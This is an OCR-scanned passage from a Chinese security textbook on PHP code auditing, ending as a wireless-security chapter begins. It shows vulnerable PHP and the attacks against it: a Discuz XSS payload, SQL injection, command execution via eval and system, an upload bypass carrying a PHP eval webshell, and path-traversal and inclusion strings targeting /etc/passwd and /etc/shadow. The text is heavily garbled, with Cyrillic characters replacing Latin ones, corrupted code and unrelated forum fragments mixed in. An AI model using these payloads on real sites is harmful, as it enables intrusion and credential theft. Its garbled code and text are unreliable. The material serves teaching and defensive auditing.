句 ， 而 else 中 的 函数 并 没有 对 $size 进 行 类 型 转换 ， 直 接 与 'Bytes' 进 行 了 配对 ， 配 对 后 的 字 
符 串 被 最 终 返回 给 function discuzcode.php 中 121 行 的 Smessage， 然 后 被 输出 。 

第 1609 行 代码 在 X3.1 补 丁 中 被 替换 为 : 
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1609 $517е = іпіуа1 ( $517е) . ' Вуіеѕ'; 


шбуа ОЕ ве А, И Г ЯА] F Ssizek XSST .- 
下 面 来 实际 测试 一 下 : 
在 Discuz X3.1 或 以 下 版 本 的 论坛 中 发 帖 时 插入 这 样 一 句 : 


еа2к:// |#1е|хѕѕ|'+а1егі (123) +" |х55/ 
图 4-16 所 示 的 对 话 框 证 明了 漏洞 的 存在 。 


ios8.3 可 以 用 又 又 助 手 越 狱 么 ? 
Г) 发 表 于 3 天 前 » 

= 
如 题 ,ios8.3 可 以 用 又 叉 助 手 越狱 么 ; 


lovely ("+аіегі(123)+' Bytes) 


图 4-16 XSS 对 话 框 

顺便 提 一 下 ， 这 个 漏洞 因为 格式 限制 不 能 包含 各 种 引号 。 不 要 灰心 ， 这 里 可 以 
用 document.write(String.fromCharCode(.… ...)); 的 方式 写 入 html 标 签 ， 如 <script src=..> 
</script>， 这 里 的 属性 src 不 需要 引号 即 可 加 载 外 部 JS 文件 ， 进 而 利用 这 个 漏洞 。 

通过 简单 地 分 析 可 以 发 现 ， 程 序 员 为 了 简化 代码 《其实 打 完 补丁 之 后 并 没有 简化) 让 
字符 串 类 型 的 $size 通 过 强制 类 型 转换 与 整 型 比较 ， 然 后 直接 将 $size 与 表示 文件 大 小 、 单 位 
的 学 符 串 进行 连接 ， 这 种 简化 是 一 个 很 不 好 的 习惯 ， 在 编写 代码 时 应 避免 利用 强制 类 型 转 
换 来 比较 不 同类 型 变量 ， 这 种 方法 往往 会 被 攻击 者 利用 就 像 这 里 一 样 )。 
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何 为 变量 覆盖 ? 首先 要 了 解 PHP 的 特性 。PHP 是 一 种 类 型 松散 的 语言 ， 它 根据 变量 的 
值 目 动 地 把 变量 转换 为 正确 的 数据 类 型 。 变 量 履 兰 就 是 指 攻击 者 在 攻击 时 给 予 其 特定 的 
值 ， 并 上 履 凋 原 有 的 固定 值 ， 从 而 引发 一 些 安全 问题 。 下 面 介 绍 第 见 的 变量 履 关 。 


4.4.1 变量 初始 化 


此 类 变量 履 盖 需要 在 register_global=on 时 才能 发 生 ， 下 面 来 看 “马云 某 白 帽子 ”的 一 
个 漏洞 。 
<?php 


/1 省 赂 无 关 代码 - -.... 
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Case МВ 


StotalNum = $mysql->numTable ("member", Swhere); 

/7 省 酷 无 关 代 码 . ..... 

Smembers = $mysql->select ("member","id,name,time,money,pro- 
vlence,city,picture",Swhere,array("id DESC"),array((S$page- 
1) *$радеМим, $pageNum)); www.2cto.com 

require (INCLUDE PATH."page.class.php"); 

$радеС1аз5 = пем page(Spage,StotalNum,SpageNum, WEB URL."member/ 
u.php?action=list", true); 

зрадеСоде = S$pageClass->getCode () ; 

$smarty->assign ("мертіё1е", "会员 列表 ") ; 

$smarty->assign("uList", $members); 

$smarty->assign ("pageCode", $радеСоае); 


$smarty->display ("member/m u list.html"); 


function numTable (S$Stable='',$wheres=false) 
{ 
$table = $this->dbPrefix.$table; 
$sql = "SELECT COUNT (*) AS num FROM `Stable`"; 
1Е (Swheres) 
{ 
$sql .- " WHERE "; 
if (is _ array ($мһегеѕ)) 
{ 
foreach ($wheres as $key => $уа1) 


{ 
Swhr [] = "`Skey`=' ".5уа1."'"; 


5541.= ітр1оае (" AND ",$whr); 
} 
else if(is string ($мһегеѕ)) 


{ 
5541.- $мһегеѕ; 


} 
$result = $this->fetch (55115->апегу ($541)); 
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гейсптп бгези 151 "пш"1; 


?> 


ХЕ ЗЕ н ууһеге КОН ВИТ ВЖ, Пе B SINA ГЕИ, МИ p aY ar 8 mi, 
在 这 里 引发 了 注入 ， 注 入 格式 为 ?action=list&where= 注 入 语句 。 
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extract(O 函 数 的 作用 是 从 数组 中 把 变量 导入 到 当前 的 符号 表 中 。 当 函数 中 type 人 参数 为 


默认 值 、 传 递 的 变量 同名 时 ， 会 进行 履 盖 ， 从 而 引发 其 他 安全 问题 。 下 面 来 看 茶 开 源 程 
序 代码 。 


сазе "сһеск info д014": 
515оп = new Services JSON; 

extract ($ REQUEST); 
人 

where изег19='$ userid' "); 

Sdata['kou'] = $CFG['info top gold'] * 1п уа! ($number); 

здага | дога т = $м до1а - $ааба['Коч"']; 

бааға-515оп->епсодйе ($data); 

echo $data; 


第 4 行 的 extract($ REQUESTIMA FAT НЫШ, KERITI А78 ma Pa $table, 
并 补 全 语句 ， 从 而 进行 注入 。 


4.5 ”命令 执行 


命令 执行 是 PHP 中 常见 的 一 种 漏洞 ， 这 种 漏洞 的 危害 较 大 ， 直 接 威 胁 到 服务 器 的 安 
全 。 在 PHP 中 ， 命 令 执行 往往 发 生 在 eval()、assert()、system()、exec()、Sshell exec()、 


passthru()、escapeshellcemd() 这 些 高 危 销 数 上 。 因 为 开发 者 的 疏忽 ， 这 些 函 数 所 执行 的 命令 
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有 时 会 出 现 用 户 可 控 的 情况 ， 从 而 导致 攻击 者 提交 恶意 代码 达到 攻击 目的 。 下 面 将 对 其 进 
行 分 析 。 


451 常见 的 命令 执行 函数 


1. eval() 


该 函数 是 把 字符 串 按照 PHP 代 码 来 执行 。 语 法 格式 : 
еуа(рЬрсоде); 
下 面 是 一 段 问题 代码 : 


<?php 
$сош=$_СЕТ['сош']; 
eval ($com); 


2 


这 是 一 段 很 简单 的 代码 ， 可 以 看 到 代码 中 将 参数 com 的 值 传递 给 变量 com， 然 后 直接 
将 变量 com 的 值 当 作 PHP 代 码 来 执行 ， 于 是 漏洞 便 产 生 了 。 当 令 参 数 com 为 phpinfo(); 时 ， 
结果 如 图 4-17 所 示 。 


| @ localhost/test.php?com=phpinfo0; W т С а Google <Ctrl+K> | ўї | аз а» | 三 


Мт ~] = $0 XSS- Encryption: Encoding» Other- 


Ші LoadURL  http://localhost/test.php?com=phpinfo0 ° 
$ Split URL + 
(») Execute 


Г] Enable Post data [F] Enable Referrer 


图 4-17 ”执行 phpinfo 命 令 
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2. ѕуѕіет() 


该 函数 类 似 C 语 言 的 system() 函 数 ， 用 来 执行 指令 ， 并 输出 结果 ， 语 法 格式 : 
system(string command, int [return уаг]); 


下 面 是 一 段 问题 代码 : 


<?php 
5соп-5 СЕТ ['сот']; 
$result=system ($сот) ; 
есһо Sresult; 


2> 


当 参 数 com 为 whoami 时 ， 结 果 如 图 4-18 所 示 。 
当 参 数 com 为 ping baidu.com 时 ， 结 果 如 图 4-19 所 示 。 


http://ocalh...g%20baidu.com x | + 


(4, @ localhost/test.php?com=ping| Y 82 v С | | Q. Google «СК | ў B » | 三 


INT Y| = Ф SQL- XSS- Encryption- Encoding- Other- 
D — ....... x | ООО ОООО. ча LoadURL |http://localhost/test.php?com=ping Байи.сот 
СФ 2 localhost/test-php?com=whoami Š Split URL 
за |O) Execute | 
Enable Post data Enable Referrer 

м >J = © SQL- XSS- Encryption- Encoding» Other- 

" 正在 Ping baidu.com [183.207.239.6] 具有 32 字 节 的 数据 : ЖЕ 183.207.239.6 
„Фак 的 回复 : 字 节 =32 时 间 =7ms TTL=57 ЖЕ 183.207.239.6 的 回复 : 字 节 =32 时 
А Split URL 间 =5ms TTL=57 ЖЕ 183.207.239.6 的 回复 : 字 节 =32 时 间 =7ms TTL=57 ЕҢ 
+) Execute 183.207.239.6 的 回复 : 字 节 =32 时 间 =6ms TTL=57 183.207.239.6 的 Ping 统计 

Г] Eneble Post data Г] Enable Referrer 信息 : 数据 包 : 已 发 送 = 4 , 已 接收 = 4 , Е = 0 (0% 去 失 ) ， 往 返 行程 的 估计 时 

| 间 ( 以 毫秒 为 单位 ): 最 短 = 5ms , 最 长 = 7ms , 平均 = 6ms 

nt authority\system 


图 4-18 ”执行 Whoami 命 令 图 4-19 ”执行 ping 命 令 


3. array_map() 


该 函数 返回 用 户 目 定义 函数 作用 后 的 数组 。 回 调 函 数 接收 的 参数 数目 应 该 和 传递 给 


атау map) 函数 的 数组 数目 一 致 ， 语 法 格式 : 


аттау map(function, апау1, array2, атауЗ3...) 


下 面 是 一 段 问 题 代 码 : 


<эрһр 
$са11раск = $ СЕТ [са11раскі]; 
баггау1 = аггау (0, 1, 2, 3); 


заггау2 = array тар ($са11раск, $аггау1); 
шъ 


令 上 述 代码 中 的 参数 callback 为 phpinfo， 结 果 如 图 4-20 所 示 。 
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| < @ localhost/test.php?callback=phpinfc v ë | Q Google <Ctri+K» | т | в + A > | 


[mr т] = e sQl- XSS- Encryption: Encoding- Other- 


ші Load URL г” а 
+ 


Г| Enable Post даа | | Enable Referrer 


4-20 ”执行 phpinfo 命 令 


4.5.2 动态 函数 


在 实际 开发 中 ， 有 的 程序 员 想 动态 调用 茶 些 函数 ， 却 往往 会 忽略 动态 函数 的 风险 。 
下 面 是 一 段 问 题 代码 : 


<?php 

Ғоипсііоп А(5д4аға)( 
echo "A:" SdaLa; 

) 

function В (Здага) { 
echo "В:".здага; 

} 

1Е (1ззе ($ СЕТ! "ТезЕ Гипс'])) { 
str o ОЕ зе ы и = COnG 
$com = $ СЕТ! "сош"1; 


$test func($com); // 动 态 调用 
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在 上 述 代 码 中 ， 程 序 员 原 意 是 想 动 态 调 用 A 函数 和 B 函 数 ， 所 以 把 变量 test func 作 为 函 
数 名 ， 并 且 可 控 。 但 这 其 实 等 同 于 可 以 执行 任意 函数 ， 当 直接 令 参 数 test_func 为 system， 
参数 com 为 ping baidu.com 时 ， 结 果 如 图 4-21 所 示 。 


http://localh...g%20baidu.com x | + 


< @ localhost/test.php?test_func=systemt Ио al | а БЕ <Ctrl+K> | ў A з 会 e > | = 


[INT "|= © SQL XSS- Encryption- Encoding- Other- 
ші LoadURL http://localhost/test.php?test func=systemRircom=ping baidu.com 
2 Split URL 


(>) Execute | 


Г] Enable Post даа | | Епа е Referrer 


正在 Ping baidu.com [183.207.239.7] 县 有 32 字 节 的 数据 : ЖН 183.207.239.7 的 回复 : 字 节 =32 时 
间 =14ms TTL=58 ЖЕ 183.207.239.7 的 回复 : 字 节 =32 时 间 =14ms TTL=58 请 求 超时 。 来 自 


183.207.239.7 的 回复 : 字 节 =32 时 间 =13ms TTL=58 183.207.239.7 的 Ping 统计 信息 : 数据 包 : BRŽ | 
= 4 ,已 接收 = 3, ЖЖ = 1 (25% 丢失 ) ， 往 返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 最 短 = 13115 ， 最 长 = 
14ms ,平均 = 13ms 


图 4-21 直接 执行 ping 命 令 


4.6 ГЕ 


190) ЕЕК? 熟悉 渗透 的 读者 一 定 知 道 文件 上 传 是 getshell 的 主要 途径 之 一 ， 是 
用 来 获取 Web 权 限 的 重要 漏洞 方式 ， 也 常常 是 Web 渗 透 的 最 后 一 关 ， 可 见 其 重要 性 。 下 面 
便 来 剖析 常见 的 文件 上 传 绕 过 漏洞 。 


4.6.1 JavaScript 绕 过 


先 来 看 一 段 实 例 代码 : 


<?php 


function uploadífile () 


{ 


$configUp=array () ; 


5соправр type l = array asbh" "ату; // 上 传人 允许 type 值 
$configUp['img'] = array("jpg","bmp","gif","png"); //img 人 允许 后 级 
бсопйадр Г "Наз! | - аггау("Яу", „"5зиЕ"); //flash 人 允许 后 组 
$сопНаОр ['оЁйсе'] = аггау ("аос", "аосх" , "аост" "аоЕх", "аот", 


нЕ. “жїз”. БЕ ьа ше ш 1 е "x lam", i mis i ia мы "КД а Е. 


"ki п е "ks п" Е я СИЕ Ш Е "ррЕ” ; Трек” е "pptm" 5 eh протх" е прош" е "ррам" ) = 


$configUp['message']=" 上 传 成 功 "; // 上传 成 功 后 显示 的 消息 , 若 为 空 则 不 显示 
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$configUp['name']= mktime();  // 上 传 后 的 文件 命名 规则 , 这 里 以 UNIX 时 间 


if (is uploaded file($ FILES['upload']['tmp name'])) 
// 判 断 上 传 类 型 是 否 被 允许 


sfilearr=pathinfo($ ЕТЪЕЗ | "пр1оай" | ['папше']); 
$filetype=S$filearr | "ехіепѕіоп"]; 

1Е (1 1п array ($filetype, $šconfigUp[ '1mg'])) 
mkhtml ($fn,"", "错误 的 文件 类 型 ! ") ; 

// 可 以 看 到 当 文 件 名 非法 时 , 调用 mkhtml 函 数 
її ($ ЕТГЕ$ | "ир1оай" | ['517е'] > Зсопйайр | "1ша 512е"1%1024) 
mkhtml ($fn,"", "上 传 的 文件 不 能 超过 " .$configUp["img size"] "КВ! "); 
$file abso=$configUp["img аіг"]."/". $сопідор ['пате'].".".$#1ебуре; 
$file host=$ SERVER['DOCUMENT ROOT '] .зШе abso; 
if (move uploaded file ($ FILES["'upload']['tmp пате'],$#1е host) ) 
{ 

mkhtml ($fn, $file арзо,зсопНайр ['теѕѕаде']); 
}е15е 
{ 
mkhtml ($fn,"", "文件 上 传 失败 , 请 检查 上 传 目 录 设 置 和 目录 读 写 权 限 ") ; 


} 


?> 


下 面 来 查看 mkhtml 函 数 。 


function mkhtml ($fn, $fileurl, $message) 

{ 
echo $str='<script type="text/jJavascript">window.parent .CKEDITOR. 
ЕСЕН САЛТ ЕНПСЕЛОПГ ein oN STTS PT PY P A s пеззадес ri 
ern >: 


ех1 + ($5%г); 
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ша 


可 以 看 到 mkhtml 调 用 的 是 一 段 JavaScript 代 码 ， 我 们 再 回 到 uploadfile 函 数 中 。 


if(!in array ($filetype, зсопйдйр | "1та'])) { 
$configUp | ' img' ] 一 аггау (е праг, "Бир", НЕЕ "рпа") Е 


这 段 代 码 判 断 当 文件 类 型 不 合法 时 便 调 用 mkhtml， 但 无 论调 用 是 否 失 败 ， 都 会 执行 上 
传代 码 ， 因 此 只 要 禁用 JavaScript 就 能 知道 上 传 文件 的 路 径 了 。 
这 里 直接 改 包 代 蔡 (因为 JavaScript 是 客户 端 脚 本 语言 ， 只 对 浏览 器 进行 了 限制 〉， 
如 图 4-22 所 示 。 
| ве | | cance | |<] > НИИ ШІН 


Request 


Concent-Disposition: form-data; name="usd nick" 


一 一 一 = 一 一 WebKitFormBoundarym26ÀWfBbH2E7Z85w 


Concent-Disposition: form-data; паме="арЕ11е"; filename="soft.php” 
Content-Type: image/jpeg 


? 
<?php Веуа1(3 РОЗТ| "ргисе"1)) ; ?> 
------ WbKitFormBoundarym2 БАМЕВЪНОЕ 7285 и 


| ? || < | [+ || > | Туре а search term 0 matche 


Незропзе 


Pragma: no-cache | 
Vary: Accept-Encoding 
Concent-Length: 462 
Content-Type: text/html 


<meta http-equiv="Content-Type" сопсепс= "сехс/ ш 


<script language="javascript"> 
parcnt.documcnt.gctElcmcntById('usd imagc') .valuc-' /uploads/4/20141004/1412405028.php' ; 
parent .document. getElementByIdl'lodingdiv').st LS š: 


parent .document.getELementById('Lodingdiv') . innerHTML ~ '<font 


color=red>O0000</font>/uploads/4/20141004/1412405028 .php<img src=" /uploads/sys/cancel.png' width="16" 
onclick-"hiddenLoding()">! ; 


| Туре а serh 
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4.6.2 文件 头 验 证 绕 过 


问题 代码 如 下 。 


<?php 

1Ғ(5 FILES[userfile] [Lype] != "image/gif") 
( 

echo "对 不 起 ,我 们 只 允许 上 传 6IF 格 式 的 图 片 !!"; 
exit; 

} 


Sdir = Ргеу1опзЕ11е/; 
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$PreviousFile = за1г.разепаше ($ FILES [userfile] [пате]); 

if (move uploaded file ($ FILES [userfile] [пр пате], зРгеу1оп5Е11е)) 
{ 

echo "文件 是 有 效 的 ,成 功 上 传 !!4"; 


} else | 

echo "文件 上 传 错误 ! | | 请 重新 上 传 ! ! 1 1 и"; 
} 

2> 


上 面 的 代码 对 文件 类 型 进行 了 判断 ， 只 允许 了 imasge/gif 这 种 类 型 。 但 是 人 们 仍 可 以 伪 
造 GIF89A 这 样 的 文件 头 进行 上 传 。 


4.6.3 ”逻辑 问题 


实例 代码 如 下 。 
<?php 
// 省 略 无 关 代码 
if ($split values[0] == strtolower($split img[1]) && $split 
уа1чез [1] == "а11ом") 
( 
$1пуа11Алта = false; 
$i = $extcount + 1000; 
| elseif ($1 == $i values в $split values[0] !- 


strtolower ($split img[1])) 
{ 
// ТЕ the image was valid, we would have exited by пом. 


зеггог occured = true; 


) 
// 省 略 无 关 代码 

if ($user dat['usedspace'] < 591гз1 ге) 

( 
ТЕҢІЗІ ехъзЕз (зизег dat Tardrr |, сос 
ЕТЪЕЗ | Вирт си 1е | ['папе'])) 

( 
if ($ РОЗТ | "оуегига Ее file'] == true) 


( 
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ип11пК (Зизег да [ '"иѕгаіг']."/".$ FILES 
ІбчһісіН1е)| | "пате! |); 
| else | 


зеггог occured = Crie: 


echo "您 试图 上 传 的 文件 已 经 存在 <br /> 请 选择 覆盖 
或 者 更 改 文件 名 重新 上 传 .<br /><br />"; 


} 
| else | 
$еггог оссигед = Егие; 
echo "您 已 经 用 光 了 所 有 的 目录 空间 .<br />"; 
} 
| else | 


ЗЕРРОГ ОССПЕСО = Еге: 


echo "目录 不 存在 . 请 联系 管理 员 .<br />"; 


1f ($error occured I= true) 
{ 
if (move uploaded file ($ FILES[$whichfile] ['tmp паше'], 
$user dat['"'usrdir'] . "/" . $ FILES[$whichfile]["'name"])) 
{ 
rename ($user да | 'usrdir'] "7" S ЕПЬЕ5 | зъл сие! | 'паше'], 
-изег да aardi r Са пера Саа ИЕ 
strtolower ($split 119111)); 
// 省 略 无 关 代 码 


?> 


ад НЕ а 28 А rename Ж Е, 5 ЖЖ-- Ра. 


if ($split values [0] == strtolower($split 1119111) && $split values[1] == 


"allow") 


当 上 传 xx.jpg.php 时 : 


$split Values [0]=xx 
$split values[1]=jpg 
$split values [2]=php 
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但 可 以 看 到 if 语 句 并 没有 判断 $split values[2], НИХ, БЕ Лтепатер Ж. 


rename ($user dat['usrdir'] . “/” . $ FILES[$whichfile]['name'], S$user ` 


даі ["оѕгаіг'] . "/" . $5рые 1п9101 . "." . зігіо1Іомег ($зр11е 1п0111)); 


这 里 会 将 之 前 上 传 的 xx.jpg.php 改 名 为 xx.jpg。 但 根据 rename 函 数 特 性 ， 当 二 次 上 传 同 
名 文件 时 ， 例 如 xx.jpg.php， 紧 接 看 会 进入 流程 ， 尝 试 被 改名 为 Xxx.jpg， 但 因为 xx.jpg 已 经 
存在 了 ， 所 以 成 功 上 传 了 xx.jpg.php。 


文件 包含 也 是 PHP 中 第 见 的 一 种 漏洞 ， 其 结果 往往 就 是 getshell， 其 危害 极 大 。 那 什 
么 是 文件 包含 呢 ? 它 往 往 出 现在 includeO0、 include onceO、requireO、require опсе(). 
fopen, Ше get _ contents 这 些 加 载 文件 的 函数 上 。 因 为 对 文件 名 没有 过 滤 ， 导 致 攻 击 者 可 以 
包含 任意 文件 或 特定 文件 ， 从 而 达到 攻击 目的 。 


4.7.1 漏洞 成 因 
问题 代码 如 下 。 


<?php 
if (S GET тат") ( 
include $ GET['dir']; 
| else | 
include 'test.php'; 
) 


ши 


这 段 代码 的 初衷 应 该 是 想 调 用 茶 文 件 的 样式 和 功能 。 但 因为 这 里 dir 为 用 户 可 控 ， 上 所 以 
可 以 调用 任意 文件 。 而 问题 就 在 于 此 ， 如 果 攻 击 者 上 传 一 个 尾部 有 PHP 恶 意 代 码 的 图 片 ， 
如 upload/xx.jpg， 再 访问 ?dir=upload/xx.jpg， 那 么 恶意 代码 就 会 被 引入 当前 文件 并 执行 ， 
从 而 达到 攻击 目的 。 

当然 ， 文 件 包 含 并 不 仅 限 于 包含 上 传 的 文件 ， 也 可 以 包含 一 些 配置 文件 。 


2dir=.htaccess 
опа ЧР ДОР 22 Ға” та aD: Cong 
степ a лу Ое 
s Ше” 
/ 


7 
./.-/../../../маг/1оад/арасце/еггог.1о4а 
(/--/../../../Иргос/сопЯа.ах ( ®гоо ИУ) 
./../../../../etc/shadow ( 需 root 权 限 ) 


е а р с 
. . . . 


РТ 
sir ТІ 
4224 
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4.7.2 RIRA 
在 实际 开发 中 ， 开 发 者 为 了 避免 受 其 害 ， 对 包含 的 路 径 做 了 很 多 限制 ， 如 下 面 这 段 代 码 。 


<?php 
Ji (5 GETI dir iji 
include ("1пс/".5 СЕТ! "Я1г"|.".п-тш"); 
Е 
从 这 里 可 以 看 到 ， 开 发 者 对 目录 和 后 级 名 都 进行 了 控制 。 但 人 们 可 以 提交 ../ 轻 松 绕 过 
对 目录 的 限制 ， 同 时 用 %00 截 断 绕 过 对 后 级 的 限制 。 如 ?dir=../../../../../../../etc/passwd， 从 而 
包含 恶意 文件 。 
注意 : %00 截 断 需 要 magic quotes gpc=off，PHP 版 本 小 于 5.3.4 时 才能 实现 。 
当然 ， 对 于 上 述 人 代码， 还 有 其 他 方法 绕 过 其 限制 ， 如 路 人 径 长 度 截断 (PHP 版 本 小 
于 5.2.8，Linux 下 文件 名 长 度 大 于 4096 字 节 ，Windows 下 长 度 大 于 256 字 节 ) 、 点 号 截断 
(PHP 版 本 小 于 5.2.8， 只 适用 于 Windows 系 统 ， 点 号 长 度 须 大 于 256 字 节 ) 等 。 
再 来 看 一 段 对 目录 进行 过 滤 的 代码 。 
<?php 
1Ғ(5 СЕТ['а1г']) { 
sstr str герфасе(”"../",".7”, 5$ СЕГО"); 
include ("даёа/". 551г) ; 
} 
рд», 
Print .php: 
<?php 
echo ВЕЕТ. 


?> 


这 段 过 滤 代码 是 用 str replace 函数 将 ../ 替 换 成 .,， 从 而 使 攻击 者 无 法 用 ../ 跳 出 目录 。 不 
过 当 提 交 ..…./ 时 ， 因 为 会 将 ../ 符 换 成 ,/， 所 以 又 再 次 变 成 了 ../， 从 而 跳出 了 目录 。 因 此 当 人 们 
提交 ?dir-.../printphp 时 ， 就 成 功 包含 了 文件 。 

测试 结果 如 图 4-23 所 示 。 


@ localhost/test.php?dir=.../print.ph 
р print.php 


[INT Y> = Ф SQL- XSS- Encryption- Encoding- Other- 
=) Load URL 
8 Split URL 
V) Execute 


Г] Enable Post data | | Enable Referrer 


test 


图 4-23 包含 本 地 文件 
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473 任意 文件 读 取 


Ше get_contents 是 最 常见 的 文件 读 取 函数 ， 用 来 把 整个 文件 读 入 一 个 字符 串 中 。 语 法 格式 : 

file get contents(path, include path, context, start, max length) 

也 就 是 我 们 党 说 的 任意 文件 读 取 ， 控 制 要 读 取 文件 的 路 人 笃 ， 从 而 达到 攻击 目的 ， 例 如 
读 取 一 些 数据 库 配 置 文 件 等 。 

先 来 看 一 段 代码 : 


<?php 

Сок еу 
$file=file де _ contents ($ СЕТ! "91г"1); 
echo $#1е; 

} 


та 


提交 ?dir=/data/web.config， 结 果 如 图 4-24 所 示 。 


| & | < localhost/test.php?dir=data/web.config| 


= Ф SQL- XSS- Encryption- Епсодта” Other- 
48 Load URL 
Ü Split URL 


+) Execute 
Enable Post data Enable Referrer 


test 
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随 看 网 络 的 普及 ， 商 业 网 站 、 政 府 网 站 、 个 人 博客 不 计 其 数 。 而 搭建 网 站 的 门槛 也 变 
得 越 来 越 低 ， 搭 建 过 程 开 始 变 得 模式 化 、 智 能 化 ， 很 多 并 不 懂 网 站 开发 的 人 也 可 以 使 用 开 
源 软件 搭建 属于 目 己 的 网 站 ， 并 且 因 为 开源 软件 价格 低廉 ， 很 多 企业 、 政 府 也 会 选择 安全 
性 高 、 口 碑 好 的 开源 软件 进行 网 站 搭建 。 因 此 ， 开 源 软件 的 安全 性 显得 尤为 重要 。 如 今 随 
看 PHP 被 广泛 使 用 ，PHP 在 开源 市 场 的 地 位 越 来 越 高 ， 这 里 以 小 结 的 形式 来 讲 讲 开源 审计 
的 经 验 。 

在 审计 一 开始 ， 首 先 应 该 通读 全 局 文件 ， 看 看 有 没有 做 一 些 全 局 过 滤 ， 并 且 大 致 了 解 
程序 的 结构 。 如 果 做 了 全 局 过 滤 ， 那 可 以 尝试 对 过 滤 代 码 进 行 bypass， 一 旦 bypass 成 功 便 
是 全 盘 沦 陷 。 

在 审计 中 ， 应 特别 留意 用 户 可 控 的 参数 。 而 对 于 可 控 参 数 的 查找 ， 可 以 检索 一 些 传 参 
数组 ， 使 审计 更 加 高 效 ， 常 见 的 传 参数 组 如 表 4-1。 
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表 4-1 常见 传 参数 组 
二 于 女人 二 


包括 了 $_GET、$_POST、$ COOKIE 等 数组 
文件 上 传 数组 


当 找 到 可 控 参 数 时 ， 就 可 以 分 析 其 进行 了 几 次 传递 ， 有 没有 进入 查询 语句 ， 经 历 了 几 
个 函数 。 而 说 到 函数 ， 在 PHP 审 计 中 ， 高 危 函 数 的 查找 也 是 极其 高 效 的 方法 之 一 ， 第 见 的 
高 危 函 数 如 表 4-2 所 示 。 


返回 PHP 的 所 有 信息 
执行 外 部 程序 或 外 部 指令 ， 与 exec0 类 似 


ё x 
“ 
HD TR 
= ЕЧ J 


获取 并 运行 外 部 程序 ， 与 include 类 似 

包含 函数 ， 与 include 区 别 是 一 开始 就 运行 

fle0 Ая ((- 
ШЕШЕТШ 


在 开源 程序 中 ， 出 现 更 多 的 是 二 次 漏洞 。 可 以 想象 一 下 ， 假 如 现在 有 很 多 物品 需要 
带 走 ， 但 一 次 带 不 了 那么 多 ， 那 可 以 分 两 次 拿 。 二 次 漏洞 也 是 如 此 ， 把 一 次 攻击 分 两 次 进 
行 ， 但 能 达到 一 样 的 目的 ， 并 且 这 种 漏洞 的 隐蔽 性 较 高 ， 在 大 中 型 开源 软件 中 也 和 背负 出 
现 ， 同 时 这 一 类 漏洞 相对 一 次 漏洞 而 言 更 耗 脑力 ， 更 考验 审计 者 的 耐心 和 体力 。 

当然 代码 审计 中 出 现 的 漏洞 远 不 止 本 章 所 说 的 这 些 ， 还 有 如 拒绝 服务 、CSRF、 平 行 
权限 、Cookie 验 证 绕 过 等 。 
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无 线 安全 或 许 是 目前 这 本 书 中 离 读者 最 近 的 一 个 领域 了 ， 通 过 前 面 章节 的 学 习 可 以 知 
道 ，Web 问 题 通常 出 现在 服务 器 上 ， 代 码 审 计 也 需要 长 时 间 的 经 验 积 累 ， 但 无 线 安 全 的 隐 
患 ， 却 就 在 人 们 身边 。 

本 章 从 多 角度 剖析 了 无 线 安全 ， 从 基本 原理 入 手 ， 然 后 切入 算法 安全 ， 闻 述 无 线 通 信 
中 加 密 算 法 的 应 用 与 破解 ; 接 痢 协 议 安全 解析 了 多 个 标准 协议 的 特性 并 指出 破绽 所 在 以 及 
漏洞 的 利用 方法 ; 通信 安全 分 析 了 无 线 通 信 过 程 中 传输 内 容 的 信息 获取 和 解读 ;杂项 应 用 
讲解 了 在 更 广 范围 的 无 线 安全 领域 中 的 各 类 技术 应 用 和 应 对 措施 。 

这 个 章节 涉及 的 理论 知识 很 多 ， 可 能 对 部 分 读者 来 说 有 些 难 度 ， 读 者 可 在 本 章 基 础 上 
目 行 寻找 一 些 感 兴 趣 的 知识 ， 我 们 也 会 在 Mapers.net 持 续 更 新 相关 知识 技能 。 


5.2 ”无线 安全 基本 原理 


无 线 安全 指 的 是 无 线 通信 和 安全。 一 人 台 设 备 中 的 信息 通过 调制 从 天 线 发 出 ， 男 一 台 设 备 
经 过 滤波 之 后 解 调 信 号 ， 获 得 信息 。 在 这 个 通信 的 过 程 中 所 有 发 射 的 信息 都 是 广播 的 ， 也 
束 是 说 任何 人 在 一 定 汇 围 内 放 一 根 天 线 都 能 接收 到 这 个 信和 号， 这 就 是 无 线 安全 所 有 应 用 的 
根本 前 提 : 如 果 数 据 会 被 别人 获取 ， 那 有 什么 解决 方法 。 


5.2.1 无 线 通 信 


无 线 通 信和 在 传输 的 过 程 中 通常 是 加 密 进 行 的 ， 有 时 由 于 设备 性 能 等 多 种 原因 会 选择 不 
加 密 ， 这 种 情况 称 为 透明 传输 ， 简 称 透 传 。 透 传 的 信号 非常 容易 被 解密 ， 因 此 是 较为 不 安 
全 的 。 只 要 攻击 者 有 合适 的 设备 来 截取 信号 ， 配 合 特定 的 开源 软件 ， 就 可 以 根据 公开 的 协 
议 进 行 解密 ， 然 后 获得 数据 ， 这 就 是 读者 所 熟知 的 “无 线 抓 包 ”。 


522 ”加 密 与 算法 


既然 直接 传输 不 安全 ， 那 肯定 就 要 考虑 加 密 传 输 了 。 加 密 的 原理 就 是 将 数据 编码 ， 以 
至 于 获取 到 数据 的 人 并 非 都 能 解读 其 中 的 内 容 ， 没 有 密 钥 或 者 解密 方法 的 人 得 到 了 加 密 过 
的 数据 也 只 能 干 瞪 眼 ， 而 无 法 获取 其 中 的 信息 〈 这 里 不 考虑 算法 的 有 效 性 和 暴 力 破解 的 可 
ВЕ) 。 所 以 加 密 这 种 操作 ， 在 无 线 传 输 这 种 路 过 多 层 进行 的 传输 中 ， 只 要 有 任何 一 层 通信 
做 了 加 密 ， 通 信 即 可 被 认为 是 安全 的 。 比 如 WiFi 没 有 加 密 ， 但 是 你 使 用 了 加 密 的 VPN 或 者 
代理 来 连接 外 部 网 站 ， 那 么 你 和 该 网 站 之 间 的 通信 依然 是 安全 的 。 

算法 是 指 程序 为 实现 某 一 目的 所 执行 的 步骤 。 加 密 算法 就 是 指 程序 在 对 数据 加 密 的 过 程 中 
所 执行 的 具体 步骤 以 及 计算 的 方法 。 常 见 的 加 密 算 法 有 AES、DES、RC4、RSA 等 。 
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5.2.3 操作 系统 与 实现 


无 线 安 全 在 实践 的 过 程 中 通 芝 会 涉及 操作 系统 的 原理 。Windows 系 统 因 为 内 核 阻隔 了 
程序 直接 与 硬件 交互 的 权限 ， 使 得 程序 只 能 通过 Windows 的 API 来 实现 与 硬件 的 交互 ， 以 
至 于 想 在 Windows 下 使 网 卡 进 入 监视 (Monitor) 状态 是 一 件 很 困难 的 事 。 由 于 这 个 原因 ， 
接 下 来 的 内 容 都 基于 Linux 系 统 。Linux 是 开源 系统 ， 具 有 更 好 的 开放 性 ， 故 被 广泛 地 用 于 
